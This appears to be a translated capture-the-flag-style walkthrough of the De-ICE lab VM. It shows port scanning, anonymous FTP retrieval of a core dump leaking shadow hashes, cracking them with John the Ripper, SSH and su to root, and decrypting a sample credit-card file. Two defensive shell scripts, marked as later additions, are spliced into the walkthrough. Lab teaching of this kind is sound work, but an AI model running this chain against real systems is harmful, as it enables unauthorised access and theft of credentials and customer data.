After installing De-ICE, we will now run a penetration test against it. This is going to be very, very, very long, so get yourself ready physically (stock up on coffee, cigarettes, peanuts) and mentally (sleep enough, don't pick a fight with your girlfriend) before reading this hacking module. Let's get straight to it: start De-ICE in VMware and open a terminal. Here is the module.
[Image: De-ICE]
Module:
root@bt5r1:~# nmap -n 192.168.1.1-255
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-27 14:07 WIT
Nmap scan report for 192.168.1.2
Host is up (0.0000080s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
902/tcp open iss-realsecure
9876/tcp open sd
Nmap scan report for 192.168.1.110
Host is up (0.16s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
631/tcp open ipp
MAC Address: 00:0C:29:FB:68:A2 (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00047s latency).
All 1000 scanned ports on 192.168.1.254 are filtered
MAC Address: 00:50:56:F4:F6:BF (VMware)
Nmap done: 255 IP addresses (3 hosts up) scanned in 10.42 seconds
From this we can see that 192.168.1.2 is our own IP, so 192.168.1.110 must be the De-ICE IP. Now that we know the target's IP, the next step is to dig further into the open ports and the services most likely running on them.
Module:
root@bt5r1:~# nmap -n -sS -sV -O 192.168.1.110
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-27 14:07 WIT
Nmap scan report for 192.168.1.110
Host is up (0.034s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh?
80/tcp open http Apache httpd 2.2.4 ((Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2)
631/tcp open ipp CUPS 1.1
MAC Address: 00:0C:29:FB:68:A2 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop
Service Info: OS: Unix
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.34 seconds
From the scan results we can see that the target has ftp, ssh and httpd (Apache = web server) ports open. That is still not much information, so let's log in to ftp with the anonymous account to find out more.
Module:
root@bt5r1:~# ftp 192.168.1.110
Connected to 192.168.1.110.
220 (vsFTPd 2.0.4)
Name (192.168.1.110:root): anonymous
331 Please specify the password.
Password: (leave it blank and press "Enter")
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
At this point we have successfully logged in to ftp; next we will explore the system's directory structure.
Module:
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 4 0 0 80 Mar 15 2007 .
drwxr-xr-x 4 0 0 80 Mar 15 2007 ..
drwxr-xr-x 7 1000 513 160 Mar 15 2007 download
drwxrwxrwx 2 0 0 60 Feb 26 2007 incoming
226 Directory send OK.
ftp> cd download
250 Directory successfully changed.
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 7 1000 513 160 Mar 15 2007 .
drwxr-xr-x 4 0 0 80 Mar 15 2007 ..
drwxr-xr-x 6 1000 513 340 Mar 15 2007 etc
drwxr-xr-x 4 1000 513 100 Mar 15 2007 opt
drwxr-xr-x 10 1000 513 400 Mar 15 2007 root
drwxr-xr-x 5 1000 513 120 Mar 15 2007 usr
drwxr-xr-x 3 1000 513 80 Mar 15 2007 var
226 Directory send OK.
ftp> cd etc
250 Directory successfully changed.
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 6 1000 513 340 Mar 15 2007 .
drwxr-xr-x 7 1000 513 160 Mar 15 2007 ..
drwxr-xr-x 4 1000 513 160 Mar 15 2007 X11
-rw-r--r-- 1 1000 513 362436 Mar 03 2007 core
drwxr-xr-x 2 1000 513 100 Mar 15 2007 fonts
-rw-r--r-- 1 1000 513 780 Apr 30 2005 hosts
-rw-r--r-- 1 1000 513 718 Jul 03 2005 inputrc
-rw-r--r-- 1 1000 513 1296 Jun 10 2006 issue
[snip...]
226 Directory send OK.
Notice the file named core, which holds a core dump (a memory, storage and debugging dump). Grab this file for analysis, then log out of the ftp client.
Module:
ftp> get core
local: core remote: core
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for core (362436 bytes).
226 File send OK.
362436 bytes received in 0.03 secs (13026.4 kB/s)
ftp> exit
221 Goodbye.
Let's look at this core file. The file we downloaded via ftp is saved automatically in our home directory, /root/.
Module:
root@bt5r1:~# strings core
tdxt
CORE
CORE
test.pl
/usr/bin/perl ./test.pl -d
CORE
CORE
FLINUX
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
ocks
CPLUS_INCLUDE_PATH=/usr/lib/qt/include:/usr/lib/qt/include
MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man:/opt/kde/man:/usr/lib/qt/doc/man
KDE_MULTIHEAD=false
HZ=100
HOSTNAME=slax.slackware-live.cd
SHELL=/bin/bash
TERM=xterm
GTK2_RC_FILES=/etc/gtk-2.0/gtkrc:/root/.gtkrc-2.0:/root/.kde/share/config/gtkrc-2.0
GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc:/root/.kde/share/config/gtkrc
GS_LIB=/root/.fonts
WINDOWID=25165831
HUSHLOGIN=FALSE
QTDIR=/usr/lib/qt
LC_ALL=C
KDE_FULL_SESSION=true
USER=root
[snip...]
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
Wow! Look at the text printed in bold red (the root, aadams, bbanter and ccoffee entries at the end of the dump). Those are the password hash strings of the De-ICE users. So what next? We have to run a password-cracking attack. This can be done with the program John the Ripper. We need a dictionary to help the cracking process. You can get the dictionary here.
Module:
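The core file was valuable only because a core dump, with the process environment and a copy of the shadow entries in its memory, was sitting in a directory served by anonymous FTP. The audit script below is an added example, not part of the original post: it greps every file in an FTP-exported tree (binaries included) for shadow-style hash fields and flags any core dump in the tree, which is the check a De-ICE administrator would want to run. The directory argument and the file names in the comments are assumptions.

```shell
#!/bin/sh
# Audit a directory tree exported over anonymous FTP for leaked password
# hashes and stray core dumps.  Added example; not the lab's own code.
set -eu

# One shadow(5)-style field, user:$id$salt$hash:, where $id$ is MD5-crypt
# ($1$, what De-ICE uses and what John cracked in minutes), SHA-crypt
# ($5$/$6$), bcrypt ($2a$/$2b$/$2y$) or yescrypt ($y$).  The salt/hash part
# never contains ':', so the trailing ':' anchors the end of the field.
HASH_RE='[a-z_][a-z0-9_-]*:\$(1|2[aby]?|5|6|y)\$[^:]+:'

find_leaked_hashes() {
    # -r recurse, -a treat binaries (core dumps!) as text, -l print each
    # offending file once.  A tree with no hits is not an error.
    grep -rlaE -- "$HASH_RE" "$1" 2>/dev/null || true
}

find_core_dumps() {
    # A core dump has no business in an FTP tree whatever it contains:
    # it carries the process environment and whatever the process had read.
    find "$1" -type f \( -name core -o -name 'core.*' \) -print
}

audit_ftp_tree() {
    # One line per finding; non-zero exit so a cron job or CI check can fail.
    findings=$(
        find_leaked_hashes "$1" | sed 's/^/LEAK (shadow-style hash): /'
        find_core_dumps "$1"    | sed 's/^/CORE (core dump in FTP tree): /'
    )
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}
```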
root@bt5r1:~# cd dictionaries/
root@bt5r1:~/dictionaries# cat common-1.txt common-2.txt common-3.txt common-4.txt wordlist.txt >> /root/passwords
root@bt5r1:~/dictionaries# cd ~
The module above compiles the dictionaries common-1.txt, common-2.txt, common-3.txt, common-4.txt and wordlist.txt into a single file named passwords in the /root/ directory.
OK, we now have the password list; next we need to assemble the shadow entries, using the core dump we grabbed earlier.
Module:
root@bt5r1:~# nano /root/shadow
Then copy-paste the part of the core dump printed in red above:
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
Strip out the unneeded entries and lay the rest out as neatly as possible into:
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
OK, we now have the shadow entries for four users:
root, aadams, bbanter, ccoffee
Time to crack! We already have the shadow file and the password list in /root/. Now run this module:
root@bt5r1:~# cd /pentest/passwords/john/
root@bt5r1:/pentest/passwords/john# ./john --rules --wordlist=/root/passwords /root/shadow
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])
Complexity (root)
Diatomaceous (ccoffee)
Zymurgy (bbanter)
guesses: 3 time: 0:00:04:40 4.37% (ETA: Thu Oct 27 16:07:48 2011) c/s: 6022 trying: Meteorologic
Session aborted
Explanation of the module above:
We used the software John the Ripper in the directory /pentest/passwords/john/, with the wordlist at /root/passwords and the target hash strings in /root/shadow. The result: 3 passwords were cracked within 0:00:04:40, namely:
Complexity (root)
Diatomaceous (ccoffee)
Zymurgy (bbanter)
So, got the passwords? Now what? That is up to you, but here is the module I ran after getting the passwords:
root@blue-dragon:~# ssh bbanter@192.168.1.110
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
4c:46:df:3d:04:f5:05:07:16:ee:76:3e:48:0a:5a:b8.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending key in /root/.ssh/known_hosts:2
RSA host key for 192.168.1.110 has changed and you have requested strict checking.
Host key verification failed.
root@blue-dragon:~# nano /root/.ssh/known_hosts
root@blue-dragon:~# ssh bbanter@192.168.1.110
The authenticity of host '192.168.1.110 (192.168.1.110)' can't be established.
RSA key fingerprint is 4c:46:df:3d:04:f5:05:07:16:ee:76:3e:48:0a:5a:b8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.110' (RSA) to the list of known hosts.
bbanter@192.168.1.110's password: [enter the password from the crack results]
Linux 2.6.16.
bbanter@slax:~$ ls -a
./ ../ .screenrc
bbanter@slax:~$ cd ..
bbanter@slax:/home$ ls -a
./ ../ aadams/ bbanter/ ccoffee/ ftp/ root/
bbanter@slax:/home$ cd root/
bbanter@slax:/home/root$ ls -a
./ ../ .save/ .screenrc
bbanter@slax:/home/root$ cd .save/
-bash: cd: .save/: Permission denied
bbanter@slax:/home/root$ su
Password: **********
root@slax:/home/root# pwd
/home/root
root@slax:/home/root# cd .save/
root@slax:/home/root/.save# ls -a
. .. copy.sh customer_account.csv.enc
root@slax:/home/root/.save# cat copy.sh
#!/bin/sh
#encrypt files in ftp/incoming
openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw
#remove old file
rm /home/ftp/incoming/$1
root@slax:/home/root/.save# openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw
3838:error:0200B015:system library:fread:Is a directory:bss_file.c:198:
3838:error:20082002:BIO routines:FILE_READ:system lib:bss_file.c:199:
root@slax:/home/root/.save# openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
root@slax:/home/root/.save# ls -a
. .. .enc copy.sh customer_account.csv customer_account.csv.enc
root@slax:/home/root/.save# cat customer_account.csv
"CustomerID","CustomerName","CCType","AccountNo","ExpDate","DelMethod"
1002,"Mozart Exercise Balls Corp.","VISA","2412225132153211","11/09","SHIP"
1003,"Brahms 4-Hands Pianos","MC","3513151542522415","07/08","SHIP"
1004,"Strauss Blue River Drinks","MC","2514351522413214","02/08","PICKUP"
1005,"Beethoven Hearing-Aid Corp.","VISA","5126391235199246","09/09","SHIP"
1006,"Mendelssohn Wedding Dresses","MC","6147032541326464","01/10","PICKUP"
1007,"Tchaikovsky Nut Importer and Supplies","VISA","4123214145321524","05/08","SHIP"
root@slax:/home/root/.save#
What I did was try to get into a directory with a high privilege level, /root/.save. Once inside, it turned out there was a file about customers; the way to get it is to run the copy.sh module with a small syntax fix.
That's all from me, have fun (=
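copy.sh as found on the box has defects that matter beyond the lab: $1 is never quoted or validated, so a name containing a path separator escapes the incoming directory while the script runs as root; an empty argument hands openssl a directory (the "Is a directory" error seen above); and rm runs even when openssl fails. The rewrite below is an added example, not the lab's file: it keeps the same openssl invocation and paths but validates the name, checks the upload exists, and only deletes the plaintext after a successful encryption. The INCOMING, SAVE and PWFILE overrides are my assumption so the function can be exercised outside the VM.

```shell
#!/bin/sh
# Hardened copy.sh: encrypt one upload from ftp/incoming into /home/root/.save.
# Added example; not the lab's own script.  Defaults match the original paths.
set -eu

encrypt_incoming() {
    name=$1
    incoming=${INCOMING:-/home/ftp/incoming}
    save=${SAVE:-/home/root/.save}
    pwfile=${PWFILE:-/etc/ssl/certs/pw}

    # Reject empty names, anything with a path separator (so "../x" cannot
    # leave the incoming directory) and dotfiles.  Exit status 2 = bad name.
    case "$name" in
        ''|*/*|.*) echo "refusing unsafe file name: '$name'" >&2; return 2 ;;
    esac

    # The upload must be a regular file; the original passed a directory to
    # openssl when $1 was empty.  Exit status 3 = nothing to encrypt.
    if [ ! -f "$incoming/$name" ]; then
        echo "no such upload: $incoming/$name" >&2; return 3
    fi

    # Same cipher and key file as the original (no -pbkdf2, which the lab's
    # OpenSSL 0.9.8b lacks; add it on modern OpenSSL).  Every path is quoted so
    # spaces and glob characters are taken literally, and the plaintext is
    # removed only after openssl reports success.
    if openssl enc -aes-256-cbc -salt \
           -in "$incoming/$name" -out "$save/$name.enc" \
           -pass "file:$pwfile"; then
        rm -- "$incoming/$name"
    else
        rm -f -- "$save/$name.enc"   # do not leave a partial ciphertext behind
        return 1
    fi
}
```

Run it as `encrypt_incoming customer_account.csv` from a root-owned cron job or the FTP upload hook, exactly where the original copy.sh was used.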
By: Blue Dragon